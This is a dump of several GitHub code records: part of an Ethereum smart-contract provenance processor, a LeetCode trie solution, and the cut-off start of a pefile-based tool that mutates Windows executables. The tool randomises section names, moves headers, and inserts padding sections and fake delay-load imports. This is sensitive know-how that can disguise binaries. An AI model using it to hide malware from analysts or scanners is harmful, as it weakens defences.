{}\r\n for dynamic_sc_call_state_parameter_written_item in self.dynamic_sc_call_state_parameter_written_memory.items():\r\n contract_state_parameter_id = dynamic_sc_call_state_parameter_written_item[0]\r\n dynamic_sc_call_state_parameter_written = dynamic_sc_call_state_parameter_written_item[1]\r\n\r\n dynamic_smart_contract_call_id = dynamic_sc_call_state_parameter_written['dynamic_smart_contract_call_id']\r\n assert dynamic_smart_contract_call_id in self.dynamic_sc_call_memory\r\n\r\n dynamic_sc_call = self.dynamic_sc_call_memory[dynamic_smart_contract_call_id]\r\n static_contract_state_parameter_id = dynamic_sc_call_state_parameter_written['static_contract_state_parameter_id']\r\n\r\n contract_id = dynamic_sc_call['dynamic_contract_id']\r\n assert contract_id in self.dynamic_contract_memory\r\n\r\n batch_id = self.dynamic_contract_memory[contract_id]['batch_id']\r\n key = (batch_id, static_contract_state_parameter_id)\r\n\r\n if key not in dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id:\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key] = list()\r\n\r\n l_i = (dynamic_sc_call['block_id'], dynamic_sc_call['transaction_id'], dynamic_sc_call_state_parameter_written)\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key].append(l_i)\r\n\r\n for key in dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id:\r\n l = dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key]\r\n 
l.sort(key=lambda t: (int(t[0]), int(t[1])), reverse=False)\r\n new_l = [i[2] for i in l]\r\n dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id[key] = new_l\r\n return dynamic_sc_call_state_parameter_written_grouped_by_contract_state_parameter_id\r\n\r\n def get_dynamic_sc_call_state_parameter_written_memory(self):\r\n dynamic_sc_call_state_parameter_written = self.relations_data['dynamic_smart_contract_call_state_parameter_written']\r\n dynamic_sc_call_state_parameter_written_memory = {}\r\n for dynamic_sc_call_state_parameter_written_item in dynamic_sc_call_state_parameter_written:\r\n dynamic_smart_contract_call_state_parameter_written_id = dynamic_sc_call_state_parameter_written_item['dynamic_smart_contract_call_state_parameter_written_id']\r\n dynamic_sc_call_state_parameter_written_memory[dynamic_smart_contract_call_state_parameter_written_id] = dynamic_sc_call_state_parameter_written_item\r\n\r\n return dynamic_sc_call_state_parameter_written_memory\r\n\r\n def get_dynamic_contract_memory(self):\r\n dynamic_contract = self.relations_data['dynamic_contract']\r\n dynamic_contract_memory = {}\r\n for dynamic_contract_item in dynamic_contract:\r\n contract_address = dynamic_contract_item['contract_address']\r\n dynamic_contract_memory[contract_address] = dynamic_contract_item\r\n return dynamic_contract_memory\r\n\r\n def get_static_path_first_read_last_written_state_parameter_memory(self):\r\n static_path_first_read_last_written_state_parameter = self.relations_data['static_path_first_read_last_written_state_parameter']\r\n static_path_first_read_last_written_state_parameter_memory = {}\r\n for static_path_first_read_last_written_state_parameter_item in static_path_first_read_last_written_state_parameter:\r\n batch_id = static_path_first_read_last_written_state_parameter_item['batch_id']\r\n static_contract_id = static_path_first_read_last_written_state_parameter_item['static_path_id']\r\n key = (batch_id, static_contract_id)\r\n\r\n if key not in static_path_first_read_last_written_state_parameter_memory:\r\n static_path_first_read_last_written_state_parameter_memory[key] = list()\r\n\r\n static_path_first_read_last_written_state_parameter_memory[key].append(static_path_first_read_last_written_state_parameter_item)\r\n return static_path_first_read_last_written_state_parameter_memory\r\n\r\n def get_static_contract_state_parameter_memory(self):\r\n static_contract_state_parameter = self.relations_data['static_contract_state_parameter']\r\n static_contract_state_parameter_memory = {}\r\n for static_contract_state_parameter_item in static_contract_state_parameter:\r\n batch_id = static_contract_state_parameter_item['batch_id']\r\n contract_state_parameter_id = static_contract_state_parameter_item['contract_state_parameter_id']\r\n key = (batch_id, contract_state_parameter_id)\r\n static_contract_state_parameter_memory[key] = static_contract_state_parameter_item\r\n\r\n return static_contract_state_parameter_memory\r\n\r\n def process_init_contract_state_parameters_values(self, contract_id, static_contract_state_parameter_grouped_by_contract_id):\r\n dynamic_sc_call_id = uuid.uuid4()\r\n # create a dummy dynamic smart contract call\r\n rel_name = 'dynamic_smart_contract_call'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n d = {\r\n 'smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'dynamic_contract_id': contract_id,\r\n 'block_id': str(-1),\r\n 'transaction_id': str(-1),\r\n 'caller_address': 'NULL',\r\n 'ether_start': 'NULL',\r\n 
'ether_end': 'NULL',\r\n 'static_function_id': 'NULL',\r\n #'static_full_path_id': 'NULL',\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_memory = self.get_dynamic_sc_call_memory()\r\n\r\n rel_name = 'dynamic_smart_contract_call_state_parameter_written'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n contract_name = self.contract_address_to_contract_info[contract_id]['contract_name']\r\n for state_parameter_item in static_contract_state_parameter_grouped_by_contract_id[contract_name]:\r\n d = {\r\n 'dynamic_smart_contract_call_state_parameter_written_id': str(uuid.uuid4()),\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_contract_state_parameter_id': state_parameter_item['contract_state_parameter_id'],\r\n 'value': state_parameter_item['initial_value'],\r\n 'prev_dynamic_smart_contract_call_state_parameter_written': 'NULL'\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_state_parameter_written_memory = self.get_dynamic_sc_call_state_parameter_written_memory()\r\n\r\n def process_dynamic_contract(self, batch_id, contract_name, contract_address):\r\n rel_name = 'dynamic_contract'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n # contract_name = self.contract_address_to_contract_info[contract_address]['contract_name']\r\n d = {\r\n 'batch_id': str(batch_id),\r\n 'contract_id': contract_name,\r\n 'deployer_address': 'not_yet_supported',\r\n 'initial_ether': 'NULL',\r\n 'contract_address': contract_address,\r\n 'contract_name': contract_name,\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n self.dynamic_contract_memory = self.get_dynamic_contract_memory()\r\n\r\n def get_current_grouped_events_data(self, grouped_dynamic_sc_call, path_counter_contract):\r\n block_ids = grouped_dynamic_sc_call.keys()\r\n block_ids = [int(v) for v in block_ids]\r\n current_max_block_id = get_max_value(block_ids)\r\n current_max_transaction_id = None\r\n if current_max_block_id is not None:\r\n transaction_ids = grouped_dynamic_sc_call[current_max_block_id].keys()\r\n transaction_ids = [int(v) for v in transaction_ids]\r\n current_max_transaction_id = get_max_value(transaction_ids)\r\n\r\n # todo - there is a bug that freezes Ganache if from_block is different from 0\r\n # current_max_block_id = 0 if current_max_block_id is None else current_max_block_id\r\n events_data = get_events_data(path_counter_contract, 0, \"latest\")\r\n grouped_events_data = {}\r\n for e in events_data:\r\n block_number = int(e['blockNumber'])\r\n transaction_index = int(e['transactionIndex'])\r\n\r\n if current_max_block_id is not None and block_number and block_number < current_max_block_id:\r\n continue\r\n\r\n if current_max_block_id is not None and block_number == current_max_block_id and transaction_index <= current_max_transaction_id:\r\n continue\r\n\r\n block_data = None\r\n if block_number not in grouped_events_data:\r\n block_data = {}\r\n grouped_events_data[block_number] = block_data\r\n else:\r\n 
block_data = grouped_events_data[block_number]\r\n\r\n transaction_data = None\r\n if transaction_index not in block_data:\r\n\r\n transaction = self.w3.eth.getTransaction(e['transactionHash'])\r\n\r\n transaction_data = {\r\n 'transaction': transaction,\r\n 'logs': list()\r\n }\r\n block_data[transaction_index] = transaction_data\r\n else:\r\n transaction_data = block_data[transaction_index]\r\n\r\n log_index = e['logIndex']\r\n args = {\r\n 'path_id': e[\"args\"]['path_id'],\r\n 'count': e[\"args\"]['count']\r\n }\r\n transaction_data['logs'].append((log_index, args))\r\n return grouped_events_data\r\n\r\n def process_dynamic_sc_function_call_parameter(self, dynamic_sc_call_id, transaction):\r\n # todo - handle transaction, which involves a smart contract deployment with constructor parameters\r\n\r\n rel_name = 'dynamic_smart_contract_function_call_parameter'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n transaction_to = transaction['transaction'].to\r\n transaction_input = transaction['transaction'].input\r\n if transaction_to in self.contract_address_to_contract:\r\n contract_item = self.contract_address_to_contract[transaction_to]\r\n contract = contract_item['contract']\r\n contract_name = contract_item['contract_id']\r\n\r\n function_name, parameters = get_function_name_and_parameters(contract, transaction_input)\r\n\r\n function_parameters = list()\r\n for p in parameters:\r\n function_parameters.append(p['type'])\r\n\r\n for p in parameters:\r\n parameter_name = p['name']\r\n parameter_value = p['val']\r\n\r\n c_name = self.contract_address_to_contract_info[contract_name]['contract_name']\r\n static_function_parameter_id = get_contract_full_function_parameter_id(c_name, function_name,\r\n function_parameters,\r\n parameter_name)\r\n\r\n d = {\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_function_parameter_id': static_function_parameter_id,\r\n 'value': str(parameter_value)\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n def process_dynamic_path(self, dynamic_sc_call_id, transaction):\r\n rel_name = 'dynamic_path'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n logs = transaction['logs']\r\n logs = [v for v in logs]\r\n logs.sort(key=lambda t: int(t[0]), reverse=False)\r\n path_ids_list = list()\r\n for log in logs:\r\n log_pos = log[0]\r\n log_args = log[1]\r\n\r\n path_id = log_args['path_id']\r\n path_count = log_args['count']\r\n\r\n path_ids_list.append(path_id)\r\n\r\n # todo sort by log_pos before writing to file\r\n d = {\r\n 'dynamic_smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'static_path_id': str(path_id),\r\n 'order': str(log_pos),\r\n 'path_count': str(path_count),\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n\r\n def process_dynamic_sc_call(self, dynamic_sc_call_id, block_id, transaction_id, transaction):\r\n rel_name = 'dynamic_smart_contract_call'\r\n facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n\r\n #hash_ = get_logs_hash(transaction)\r\n transaction_to = transaction['transaction'].to\r\n transaction_from = transaction['transaction']['from']\r\n transaction_input = transaction['transaction'].input\r\n\r\n # 
static_function_id = None\r\n\r\n # todo - constructor call on deployed contract without a to address is not supported yet\r\n contract_item = self.contract_address_to_contract[transaction_to]\r\n contract = contract_item['contract']\r\n contract_name = contract_item['contract_id']\r\n function_name, parameters = get_function_name_and_parameters(contract, transaction_input)\r\n\r\n function_parameters = list()\r\n for p in parameters:\r\n function_parameters.append(p['type'])\r\n\r\n c_name = self.contract_address_to_contract_info[contract_name]['contract_name']\r\n static_function_id = full_function_signature(c_name, function_name, function_parameters)\r\n\r\n d = {\r\n 'smart_contract_call_id': str(dynamic_sc_call_id),\r\n 'dynamic_contract_id': transaction_to if transaction_to is not None else 'NULL',\r\n 'block_id': str(block_id),\r\n 'transaction_id': str(transaction_id),\r\n 'caller_address': transaction_from,\r\n 'ether_start': 'not_yet_supported',\r\n\r\n # 'ether_end': 'not_yet_supported',\r\n 'ether_end': str(self.w3.eth.getBalance(transaction_to)) if transaction_to is not None else 'NULL',\r\n\r\n 'static_function_id': static_function_id if static_function_id is not None else 'NULL',\r\n #'static_full_path_id': str(hash_),\r\n }\r\n append_query_line_from_dic(d, rel_name, self.souffle_query_relations_metadata, facts_file_path)\r\n load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations_metadata, self.relations_data)\r\n self.dynamic_sc_call_memory = self.get_dynamic_sc_call_memory()\r\n\r\n def get_dynamic_sc_call_memory(self):\r\n dynamic_sc_call = self.relations_data['dynamic_smart_contract_call']\r\n dynamic_sc_call_memory = {}\r\n for dynamic_sc_call_item in dynamic_sc_call:\r\n smart_contract_call_id = dynamic_sc_call_item['smart_contract_call_id']\r\n dynamic_sc_call_memory[smart_contract_call_id] = dynamic_sc_call_item\r\n\r\n return dynamic_sc_call_memory\r\n\r\n # def process_dynamic_contract_(self):\r\n # # dynamic_contract\r\n # rel_name = 'dynamic_contract'\r\n # facts_file_path = self.facts_dir_path + rel_name + '.facts'\r\n # dynamic_contract_data = self.relations_data[rel_name]\r\n # for c_item in self.contracts.items():\r\n # contract_id = c_item[0]\r\n # contract_address = c_item[1].address\r\n #\r\n # contract_found = False\r\n # for d in dynamic_contract_data:\r\n # if d['contract_id'] == contract_id:\r\n # contract_found = True\r\n #\r\n # if not contract_found:\r\n # d = {\r\n # 'contract_id': contract_id,\r\n # 'deployer_address': 'not_yet_supported',\r\n # 'ether': 'not_yet_supported',\r\n # 'contract_address': contract_address,\r\n # }\r\n # append_query_line_from_dic(d, rel_name, self.souffle_query_relations, facts_file_path)\r\n #\r\n # load_relation(rel_name, self.facts_dir_path, self.souffle_query_relations, self.relations_data)\r\n\r\n def get_contract(self, contract_address):\r\n #contract_address = self.contract_address_to_contract_info[contract_name]['contract_address']\r\n address = self.w3.toChecksumAddress(contract_address)\r\n abi = self.contract_address_to_contract_info[contract_address]['contract_abi']\r\n myContract = self.w3.eth.contract(address=address, abi=abi)\r\n\r\n return myContract\r\n\r\n\r\npp = ProvenanceProcessor()\r\npp.run()\r\n\r\n\r\n\r\n\r\n\r\n\r\n# def process_events(myContract, contract_name, full_event_name_to_event_details):\r\n# for contractEvent in myContract.events:\r\n# myfilter = contractEvent.createFilter(fromBlock=0, toBlock=\"latest\")\r\n# eventlist = myfilter.get_all_entries()\r\n#\r\n# for 
event in eventlist:\r\n# # t = w3.eth.getTransactionByBlock(event[\"blockNumber\"], event[\"transactionIndex\"])\r\n#\r\n# event_name = event[\"event\"]\r\n# # print(event_name+\"--------------------------------------------\"+contract_name)\r\n# # if event_name.startswith(\"_provenance_call_\"):\r\n# if event_name.startswith(\"_provenance_\"):\r\n# # print(event)\r\n#\r\n# full_event_name = contract_name + \"_\" + event_name\r\n#\r\n# if full_event_name not in full_event_name_to_event_details:\r\n# args_names_list = []\r\n# args_names_list.append(\"position\")\r\n# for arg_name in event[\"args\"]:\r\n# args_names_list.append(arg_name)\r\n#\r\n# full_event_name_to_event_details[full_event_name] = args_names_list\r\n#\r\n# args_names_list = full_event_name_to_event_details[full_event_name]\r\n# print(\", \".join(args_names_list))\r\n#\r\n# position = str(event[\"blockNumber\"]) + \"_\" + str(event[\"transactionIndex\"]) + \"_\" + str(\r\n# event[\"logIndex\"])\r\n#\r\n# args_values = []\r\n# for arg_name in args_names_list:\r\n# if arg_name == \"position\":\r\n# args_values.append(position)\r\n# else:\r\n# args_values.append(str(event[\"args\"][arg_name]))\r\n#\r\n# write_line_to_file(\"\\t\".join(args_values), facts_dir_path + full_event_name + \".facts\", \"a\")\r\n#\r\n# print(\"\\t\".join(args_values))\r\n# print()\r\n\r\n\r\n# def write_socialite_query(full_event_name_to_event_details):\r\n# write_to_file(\"\", socialite_dir_path + \"query.py\", \"w\")\r\n#\r\n# for full_event_name in full_event_name_to_event_details:\r\n# event_args_str_list = []\r\n# args_names = full_event_name_to_event_details[full_event_name]\r\n# for arg_name in args_names:\r\n# event_args_str_list.append(\"String \" + arg_name)\r\n#\r\n# facts_file_path = facts_dir_path + full_event_name + '.facts'\r\n#\r\n# write_line_to_file('print(\"reading ' + facts_file_path + '\")', socialite_dir_path + \"query.py\", \"a\")\r\n#\r\n# load_rel_cmd = socialite_str_symbol + full_event_name + '(' + ', '.join(event_args_str_list) + ').\\n'\r\n# load_rel_cmd += full_event_name + '(' + ', '.join(args_names) + ') :- l=$read(\"' + facts_file_path + '\"),\\n'\r\n# load_rel_cmd += '(' + ', '.join(args_names) + ') = $split(l,\"\\\\t\").' 
+ socialite_str_symbol + '\\n'\r\n# print(load_rel_cmd)\r\n# print()\r\n#\r\n# write_line_to_file(load_rel_cmd, socialite_dir_path + \"query.py\", \"a\")\r\n\r\n\"\"\"\r\n filters = [ event.createFilter(fromBlock=log[\"block\"], fromBlock=log[\"block\"])\r\n for event in myContract.events\r\n if isinstance(event, contractEvent)]\r\n createFilter(fromBlock=\"latest\", argument_filters={\"arg1\":10})\r\n contractEvent.processReceipt(receipt)\r\n\r\n \r\n print(event)\r\n print()\r\n\"\"\" \r\n\r\n\"\"\"\r\nfilter = w3.eth.filter({\"fromBlock\": 0, \"toBlock\": w3.eth.blockNumber})\r\nlogs = w3.eth.getFilterLogs(filter.filter_id)\r\nprint(len(logs))\r\nfor log in logs: \r\n contract_address = log[\"address\"]\r\n if contract_address in contract_info:\r\n receipt = w3.eth.getTransactionReceipt(log[\"transactionHash\"])\r\n contract_abi = contract_info[contract_address][\"abi\"]\r\n myContract = w3.eth.contract(address=contract_address, abi=contract_abi)\r\n \r\n #p = myContract.events.myEvent().processReceipt(receipt)\r\n for contractEvent in myContract.events:\r\n filters = [ event.createFilter(fromBlock=log[\"block\"], fromBlock=log[\"block\"])\r\n for event in myContract.events\r\n if isinstance(event, contractEvent)]\r\n \r\n \r\n print(event)\r\n print()\r\n \r\n print(receipt)\r\n print()\r\n print()\r\n\r\n\r\n\"\"\"\r\n\r\n\"\"\"\r\nfilter = w3.eth.filter({\"fromBlock\": 0, \"toBlock\": w3.eth.blockNumber})\r\nlogs = w3.eth.getFilterLogs(filter.filter_id)\r\nprint(len(logs))\r\nfor log in logs: \r\n contract_address = log[\"address\"]\r\n if contract_address in contract_info:\r\n receipt = w3.eth.getTransactionReceipt(log[\"transactionHash\"])\r\n contract_abi = contract_info[contract_address][\"abi\"]\r\n myContract = w3.eth.contract(address=contract_address, abi=contract_abi)\r\n \r\n #p = myContract.events.myEvent().processReceipt(receipt)\r\n for contractEvent in myContract.events:\r\n print(event)\r\n print()\r\n \r\n print(receipt)\r\n print()\r\n print()\r\n\r\n\"\"\"\r\n","repo_name":"shomzy/EtherProv","sub_path":"ProvenanceProcessor/ProvenanceProcessor.py","file_name":"ProvenanceProcessor.py","file_ext":"py","file_size_in_byte":48787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42601668353","text":"\"\"\"\nhttps://leetcode.com/problems/implement-trie-prefix-tree/\nRuntime: 152 ms, faster than 77.53% of Python3 online submissions for Implement Trie (Prefix Tree).\nMemory Usage: 27.2 MB, less than 66.67% of Python3 online submissions for Implement Trie (Prefix Tree).\n\"\"\"\n\n\nclass Trie:\n def __init__(self):\n self.trie = {}\n\n def insert(self, word: str) -> None:\n dic = self.trie\n for ch in word:\n if not ch in dic.keys():\n dic[ch] = {'end':False}\n dic = dic[ch]\n dic['end'] = True\n\n def search(self, word: str) -> bool:\n dic = self.trie\n for ch in word:\n if ch in dic.keys():\n dic = dic[ch]\n else:\n return False\n return dic['end']\n\n def startsWith(self, prefix: str) -> bool:\n dic = self.trie\n for ch in prefix:\n if ch in dic.keys():\n dic = dic[ch]\n else:\n return False\n return True\n","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/medium/208_implement_trie_prefix_tree/hsh2438.py","file_name":"hsh2438.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"73011184787","text":"import pefile\nfrom pefile import PE\nfrom random import shuffle, randint\nfrom typing import List\nfrom 
string import ascii_uppercase\nfrom struct import pack\nfrom pebutcher.utils.helpers import mixed_list_to_bytes\n\n\nclass PeWorker:\n \"\"\"\n PeWorker is a class that extends pefile.\n It adds functionality for \"smart\" writing of data structures into a PE file, which the pefile module itself does not support.\n \"\"\"\n\n def __init__(self, pe: str):\n self.pe = PE(pe)\n self.random_section_names = [b'.puk', b'.kek', b'.chicky', b'bombonya',\n b'.chunky', b'.junky', b'.funky', b'.punky', b'.spunky', b'.skunky', b'.monkey',\n b'.booboo', b'.booboomba', b'.yaah', b'.tutudu',\n b'.t3x7', b'.d474', b'.rDaT4', b'.r310c', b'.p4g3', b'.1337',\n b'.palace', b'.budha', b'.beeba', b'.bubba', b'.tsoy', b'.putin', b'.trump',\n b'.no', b'.yes', b'.r3v', b'.3r5',\n b'.domo', b'.arigato', b'.mister', b'.roboto',\n b'.i_have', b'.higher', b'.grando', b'.anakin']\n\n def randomise_section_names(self):\n shuffle(self.random_section_names)\n for section, name in zip(self.pe.sections, self.random_section_names):\n section.Name = name\n\n def randomize_nt_header_location(self, bytelist: List[str], insert_offset: int) -> bytes:\n \"\"\"\n Inserts data into the PE file and updates the offsets of the remaining structures.\n\n :param bytelist: data to insert (a random set of bytes)\n :param insert_offset: offset (address in the file) where the data will be inserted\n :return: the modified PE file as bytes\n \"\"\"\n max_size = self.pe.OPTIONAL_HEADER.FileAlignment\n # if something is wrong in this code we might as well crash hard,\n # there is no point in continuing\n if len(bytelist) > max_size:\n raise ValueError(\"len(bytelist) > max_size\")\n\n # if something is wrong in this code we might as well crash hard,\n # there is no point in continuing\n if (len(bytelist) % 4) != 0:\n raise ValueError(\"len(bytelist) % 4 != 0\")\n\n nop_str = ['\\x90'] * (max_size - len(bytelist))\n\n file_data = list(self.pe.__data__)\n\n total_size_of_sect_hdrs = 0\n for section in self.pe.sections:\n total_size_of_sect_hdrs += list(section.__pack__()).__len__()\n\n # insert zeroes after the section headers for padding\n offset_after_sect_hdr = self.pe.sections[0].get_file_offset() + total_size_of_sect_hdrs\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n # TODO accept bytelist as bytes rather than as a list of strings\n # insert the bytes before the NT_HEADERs\n file_data.insert(insert_offset, bytelist)\n self.pe.DOS_HEADER.e_lfanew += len(bytelist)\n\n # update every PointerToRawData to match the size of the insert\n for section in self.pe.sections:\n section.PointerToRawData += max_size\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n # likewise fix up all of the structure offsets\n for structure in self.pe.__structures__:\n offset = structure.get_file_offset()\n if offset >= insert_offset:\n if offset >= offset_after_sect_hdr:\n structure.set_file_offset(offset + max_size)\n else:\n structure.set_file_offset(offset + len(bytelist))\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n # TODO remove the kludge that coerces all of the data to bytes\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n def modify_sections(self, total_sections_num: int, update_size_of_image: bool) -> bytes:\n \"\"\"\n Modifies the sections in the PE file, adding new ones until there are total_sections_num of them.\n\n :param total_sections_num: total number of sections after the function has run\n :param update_size_of_image: whether SizeOfImage should be updated\n 
:return: the modified PE file as bytes\n \"\"\"\n num_sect_to_add = total_sections_num - self.pe.FILE_HEADER.NumberOfSections\n if num_sect_to_add == 0:\n raise ValueError()\n\n self.pe.FILE_HEADER.NumberOfSections = total_sections_num\n\n # pick random names for the new sections\n shuffle(self.random_section_names)\n sect_names = self.random_section_names[:num_sect_to_add]\n\n # make the size of every section equal to self.OPTIONAL_HEADER.FileAlignment\n max_size = self.pe.OPTIONAL_HEADER.FileAlignment\n\n file_data = list(self.pe.__data__)\n\n total_size_of_existing_sect_hdrs = 0\n for section in self.pe.sections:\n total_size_of_existing_sect_hdrs += list(section.__pack__()).__len__()\n sect_hdr_size = self.pe.sections[0].sizeof()\n total_size_of_new_sect_hdrs = num_sect_to_add * sect_hdr_size\n\n # create a temporary section; the same approach is used further below\n # TODO extract into a separate function\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n tmp_section.__unpack__(b'\\0' * sect_hdr_size)\n nop_str = ['\\x90'] * (max_size - total_size_of_new_sect_hdrs)\n\n # compute the end virtual address of the last section\n end_va = self.pe.sections[len(self.pe.sections) - 1].VirtualAddress + self.pe.sections[\n len(self.pe.sections) - 1].Misc_VirtualSize\n # round up to the page size\n if end_va % 0x1000:\n end_va += (0x1000 - end_va % 0x1000)\n\n # insert the SectionHeaders after the existing ones\n offset_after_sect_hdr = self.pe.sections[0].get_file_offset() + total_size_of_existing_sect_hdrs\n tmp_section.set_file_offset(offset_after_sect_hdr)\n i = 0\n while i < num_sect_to_add:\n tmp_section.Name = sect_names[i]\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.SizeOfRawData = max_size\n tmp_section.VirtualAddress = end_va + i * 0x1000\n tmp_section.PointerToRawData = 0x400\n tmp_section.Misc_VirtualSize = 0x200\n tmp_section.Characteristics = 0x40000040\n file_data.insert(offset_after_sect_hdr, tmp_section.__pack__())\n\n offset_after_sect_hdr += sect_hdr_size\n i += 1\n\n # the Windows image loader actually ignores OPTIONAL_HEADER.SizeOfImage,\n # so it does not have to be updated, but update it anyway for cleanliness\n if update_size_of_image:\n self.pe.OPTIONAL_HEADER.SizeOfImage = (tmp_section.Misc_VirtualSize + tmp_section.VirtualAddress)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += total_size_of_new_sect_hdrs\n\n # insert NOPs for padding\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n # update PointerToRawData in the sections\n for section in self.pe.sections:\n section.PointerToRawData += max_size\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n # fix up the structures in the same way\n # TODO extract into a separate method\n for structure in self.pe.__structures__:\n offset = structure.get_file_offset()\n if offset >= offset_after_sect_hdr:\n structure.set_file_offset(offset + max_size)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n def create_delay_load_entries(self, random_dll_list: List[str], random_functions_list) -> bytes:\n \"\"\"\n Appends, after the existing sections, a section that holds the delay-load descriptor table,\n the delay load IAT, the delay load INT and the table of dll names.\n\n :param random_dll_list: random libraries in the structure\n :param random_functions_list: 
functions in the table\n :return: the same as the previous methods\n \"\"\"\n file_data = list(self.pe.__data__)\n self.pe.FILE_HEADER.NumberOfSections += 1\n num_delay_load_entries = len(random_dll_list)\n\n i = 0\n dl_idt = []\n # create the descriptor structures\n while i < num_delay_load_entries:\n d_import_desc = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__)\n struct_size = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__).sizeof()\n d_import_desc.__unpack__(b'\\0' * struct_size)\n d_import_desc.grAttrs = 1\n d_import_desc.pIAT = 0xAAAAAAAA\n d_import_desc.pINT = 0xBBBBBBBB\n d_import_desc.szName = 0xCCCCCCCC\n dl_idt.append(d_import_desc)\n i += 1\n # create one extra record because the list of structures is null-terminated\n d_import_desc = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__)\n struct_size = pefile.Structure(self.pe.__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__).sizeof()\n d_import_desc.__unpack__(b'\\0' * struct_size)\n dl_idt.append(d_import_desc)\n\n total_delay_load_directory_table_size = struct_size * (num_delay_load_entries + 1)\n # update the size\n total_delay_load_data_size_for_everything = total_delay_load_directory_table_size\n\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n sect_hdr_size = self.pe.sections[0].sizeof()\n tmp_section.__unpack__(b'\\0' * sect_hdr_size)\n\n existing_last_section_end_va = self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize\n\n if existing_last_section_end_va % 0x1000:\n existing_last_section_end_va += (0x1000 - existing_last_section_end_va % 0x1000)\n\n offset_after_dlidt = existing_last_section_end_va + total_delay_load_directory_table_size\n x = 0\n # nested list of library names\n dl_dll_names = []\n # array of RVA pointers to code for dynamic loading; the addresses are not real\n dl_iat = []\n # array of RVA pointers to the hint/name structures\n dl_int = []\n # the names and hints themselves\n dl_hint_names = []\n # accumulator for the lists above\n master_byte_array = []\n while x < num_delay_load_entries:\n dl_idt[x].szName = offset_after_dlidt + len(master_byte_array)\n dl_dll_names += [[]]\n dl_dll_names[x] += list(random_dll_list[x])\n dl_dll_names[x] += ['\\x00']\n master_byte_array += dl_dll_names[x]\n dl_idt[x].pIAT = offset_after_dlidt + len(master_byte_array)\n num_functions_per_dll = 10\n i = 0\n\n # fill in the IAT first, since 
